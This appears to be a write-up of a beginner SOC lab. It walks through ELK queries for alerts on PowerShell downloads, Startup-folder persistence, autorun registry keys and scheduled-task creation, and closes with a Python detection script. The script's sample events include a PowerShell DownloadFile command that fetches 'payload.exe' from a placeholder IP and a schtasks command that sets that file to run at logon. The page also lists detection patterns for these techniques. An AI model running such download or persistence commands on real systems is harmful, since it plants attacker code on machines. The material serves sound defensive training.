SOC ALPHA 1

Difficulty: Easy

Scenario: You are a SOC analyst and handling the alerts within your SIEM, ELK, is part of daily duties. Answer the following questions by analysing the alerts provided in README.txt!

ELK should start within 5 minutes; if it does not, start the services manually:
sudo systemctl start elasticsearch
sudo systemctl start kibana
sudo systemctl start logstash

Tools: ELK | LogAnalysis | Network Analysis

Q1) Alert 1 (1/2) - What is the cmdlet used for downloading?

README.txt shows us that, in order to see the logs that triggered Alert 1, we need to filter for "*.DownloadFile*" OR "*.DownloadString*" OR "*Invoke-WebRequest*" and set the time frame from 14-4-2021 10:00 to 14-4-2021 11:00:

ELK Search for A1 - Suspicious PowerShell Download

Answer

Q&A 1

Q2) Alert 1 (2/2) - What is the full URL from which the file is downloaded?

Looking at the same logs as in the first question, we can see the full command containing the URL we are interested in:

ELK Search for A1 - Suspicious PowerShell Download

Answer

Q&A 2

Q3) Alert 2 (1/1) - What is the name of the suspicious EXE that is added for Persistence?

To see the logs that triggered Alert 2, we need to filter for (Event_System_EventID :"11" AND Event_EventData_Image : *Windows\\Start*\\Programs\\\Startup*) and set the time frame from 14-4-2021 10:00 to 14-4-2021 11:00. Sysmon Event ID 11 is FileCreate, so this query returns files written into a Startup folder, which Windows runs at every logon:

ELK Search for A2 - Potential Persistance Mechanism - FileCreation

Answer

Q&A 3

Q4) Alert 3 (1/2) - What is the name of the suspicious executable file involved?

To see the logs that triggered Alert 3, we need to filter for (Event_System_EventID:("12" OR "13" OR "14") AND (Event_EventData_TargetObject:("*\SOFTWARE\Wow6432Node\Microsoft\ActiveSetup\InstalledComponents*" OR "\SOFTWARE\Microsoft\WindowsCE*Services\AutoStartOnDisconnect*" OR "\SOFTWARE\Microsoft\WindowsCEServices\AutoStartOnConnect" OR "\SYSTEM\Setup\CmdLine" OR "\Software\Microsoft\Ctf\LangBarAddin*" OR "*\Software\Microsoft\CommandProcessor\Autorun" OR "\Run"))) and set the time frame from 15-4-2021 8:00 to 15-4-2021 9:00. Sysmon Event ID 12 covers registry key creation and deletion, Event ID 13 records a registry value being set, and Event ID 14 records key or value renames; the hit here is an Event ID 13. At the very end of the Event_EventData_TargetObject field we can see the suspicious executable:

ELK Search for A3 - Autorun Keys Modification

Answer

Q&A 4

Q5) Alert 3 (2/2) - What is the name of the key path?

Looking at the same log as in Q4, we can find the key path in the same field (Event_EventData_TargetObject). However, the answer to the question is not the full path, only the key itself:

ELK Search for A3 - Autorun Keys Modification

Answer

Q&A 5

Q6) Alert 4 (1/2) - What is the name of the task?

To see the log that triggered Alert 4, we need to filter for Event_EventData_Image:schtasks.exe AND Event_EventData_CommandLine:Create and set the time frame from 20-4-2021 10:00 to 20-4-2021 15:00. In the log we can see that schtasks.exe has been run with /Create. The name of the task is what comes after the "/TN" (task name) parameter:

ELK Search for A4 - Suspicious Task Creation

Answer

Q&A 6

Q7) Alert 4 (2/2) - What is the full path of the program?

Looking at the same log as in Q6, we can find the full path of the program following the "/TR" (task run) parameter:

ELK Search for A4 - Suspicious Task Creation

Answer

Q&A 7
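The four alert rules above (PowerShell download, Startup-folder file creation, autorun registry key change, schtasks /Create) can also be applied outside Kibana. The following is an added example, not part of the lab or the original write-up: it runs each rule over constructed Sysmon-style events using the page's field names and pulls out the same answer fields (cmdlet and URL, Startup executable, value and key name, /TN and /TR). All paths, the 203.0.113.5 URL and the task name are placeholders, not the lab data.

```python
import re

# Constructed sample events; field names follow the ELK queries on this page.
EVENTS = [
    {"Event_System_EventID": "1",
     "Event_EventData_CommandLine": "powershell -c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.5/payload.exe','C:\\Users\\Public\\p.exe')\""},
    {"Event_System_EventID": "11",
     "Event_EventData_Image": "C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchosts.exe"},
    {"Event_System_EventID": "13",
     "Event_EventData_TargetObject": "HKU\\S-1-5-21-1\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchosts.exe"},
    {"Event_System_EventID": "1", "Event_EventData_Image": "C:\\Windows\\System32\\schtasks.exe",
     "Event_EventData_CommandLine": "schtasks /Create /SC ONLOGON /TN \"Updater\" /TR \"C:\\Users\\Public\\p.exe\""},
]

DOWNLOAD = re.compile(r"\.DownloadFile|\.DownloadString|Invoke-WebRequest")
URL = re.compile(r"""https?://[^\s'"()]+""")
STARTUP = re.compile(r"Windows\\Start.*\\Programs\\Startup\\", re.I)
# Same autorun locations as the Alert 3 query (key names only, any hive prefix).
AUTORUN = re.compile(r"\\(Run|ActiveSetup\\InstalledComponents|AutoStartOn(Dis)?connect|LangBarAddin|CommandProcessor\\Autorun|Setup\\CmdLine)\b", re.I)
ARG = r'(?:"([^"]+)"|(\S+))'  # one schtasks argument, quoted or bare

def a1_download(ev):
    """Alert 1: (download cmdlet/method, URL) from a PowerShell command line."""
    cmd = ev.get("Event_EventData_CommandLine", "")
    m = DOWNLOAD.search(cmd)
    if not m:
        return None
    url = URL.search(cmd)
    return m.group(0).lstrip("."), url.group(0) if url else None

def a2_startup_file(ev):
    """Alert 2: executable name created in a Startup folder (Sysmon ID 11)."""
    path = ev.get("Event_EventData_Image", "")
    if ev.get("Event_System_EventID") == "11" and STARTUP.search(path):
        return path.rsplit("\\", 1)[-1]
    return None

def a3_autorun(ev):
    """Alert 3: (value name, key name) for a registry event on an autorun key (IDs 12-14)."""
    target = ev.get("Event_EventData_TargetObject", "")
    if ev.get("Event_System_EventID") in ("12", "13", "14") and AUTORUN.search(target):
        parts = target.split("\\")
        return parts[-1], parts[-2]  # Q4 answer is the last part, Q5 answer the key before it
    return None

def a4_schtask(ev):
    """Alert 4: (task name from /TN, program from /TR) for a schtasks /Create."""
    cmd = ev.get("Event_EventData_CommandLine", "")
    if not ev.get("Event_EventData_Image", "").lower().endswith("schtasks.exe") or "/create" not in cmd.lower():
        return None
    pick = lambda m: (m.group(1) or m.group(2)) if m else None
    return pick(re.search(r"/TN\s+" + ARG, cmd, re.I)), pick(re.search(r"/TR\s+" + ARG, cmd, re.I))

def triage(events):
    """Apply all four rules to each event and return (alert, extracted fields) hits."""
    rules = (("A1", a1_download), ("A2", a2_startup_file), ("A3", a3_autorun), ("A4", a4_schtask))
    return [(name, r) for ev in events for name, rule in rules if (r := rule(ev))]
```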
